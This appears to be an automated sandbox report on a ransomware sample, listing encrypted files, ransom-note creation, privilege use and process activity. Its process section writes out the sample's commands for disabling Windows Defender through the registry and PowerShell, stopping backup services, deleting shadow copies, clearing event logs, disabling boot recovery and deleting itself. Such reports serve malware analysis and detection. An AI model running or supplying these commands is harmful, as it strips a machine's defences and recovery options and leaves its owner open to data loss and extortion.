| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\MJZ1_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\excel.x-none.msi.16.x-none.tree.dat.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\SplashScreen\PaintSplashScreen.scale-200.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-white\LargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\dancing.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ng_60x42.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreBadgeLogo.scale-200.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark.gif.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__LgAAAC4AAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__FAAAABQAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\ja-JP\WMPMediaSharing.dll.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ads_premium.jpg | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-black\SmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.targetsize-20_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-48.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5511_24x24x32.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-ul-phn.xrm-ms.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__MAAAADAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\OFFSYMSL.TTF.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-60_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\PeopleAppList.scale-200.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeLogo.scale-200.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-36_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldNotThrow.snippets.ps1xml | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\MJZ1_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\he-IL\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_KMS_ClientC2R-ul-oob.xrm-ms.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AgAAAAIAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sk-sk\MJZ1_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\165.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
"C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12d5a" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12d5a" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12d5a" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SYSTEM32\notepad.exe
notepad.exe C:\MJZ1_HOW_TO_DECRYPT.txt
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 52.109.8.21:443 | tcp | |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 40.119.148.38:123 | time.windows.com | udp |
Files
memory/1280-115-0x0000000000000000-mapping.dmp
memory/3956-116-0x0000000000000000-mapping.dmp
memory/3948-117-0x0000000000000000-mapping.dmp
memory/2356-118-0x0000000000000000-mapping.dmp
memory/2992-119-0x0000000000000000-mapping.dmp
memory/3388-120-0x0000000000000000-mapping.dmp
memory/3812-121-0x0000000000000000-mapping.dmp
memory/1140-122-0x0000000000000000-mapping.dmp
memory/3484-123-0x0000000000000000-mapping.dmp
memory/448-124-0x0000000000000000-mapping.dmp
memory/772-125-0x0000000000000000-mapping.dmp
memory/3820-126-0x0000000000000000-mapping.dmp
memory/2496-127-0x0000000000000000-mapping.dmp
memory/2728-128-0x0000000000000000-mapping.dmp
memory/3376-129-0x0000000000000000-mapping.dmp
memory/1168-130-0x0000000000000000-mapping.dmp
memory/1232-131-0x0000000000000000-mapping.dmp
memory/3656-132-0x0000000000000000-mapping.dmp
memory/3688-133-0x0000000000000000-mapping.dmp
memory/3684-134-0x0000000000000000-mapping.dmp
memory/1424-135-0x0000000000000000-mapping.dmp
memory/860-136-0x0000000000000000-mapping.dmp
memory/1064-137-0x0000000000000000-mapping.dmp
memory/3308-138-0x0000000000000000-mapping.dmp
memory/2532-139-0x0000000000000000-mapping.dmp
memory/1448-140-0x0000000000000000-mapping.dmp
memory/1652-141-0x0000000000000000-mapping.dmp
memory/1516-142-0x0000000000000000-mapping.dmp
memory/1012-143-0x0000000000000000-mapping.dmp
memory/2440-144-0x0000000000000000-mapping.dmp
memory/3796-145-0x0000000000000000-mapping.dmp
memory/2984-146-0x0000000000000000-mapping.dmp
memory/2472-147-0x0000000000000000-mapping.dmp
memory/2704-148-0x0000000000000000-mapping.dmp
memory/3528-149-0x0000000000000000-mapping.dmp
memory/704-150-0x0000000000000000-mapping.dmp
memory/3172-151-0x0000000000000000-mapping.dmp
memory/456-152-0x0000000000000000-mapping.dmp
memory/3028-153-0x0000000000000000-mapping.dmp
memory/2124-154-0x0000000000000000-mapping.dmp
memory/2288-155-0x0000000000000000-mapping.dmp
memory/2820-156-0x0000000000000000-mapping.dmp
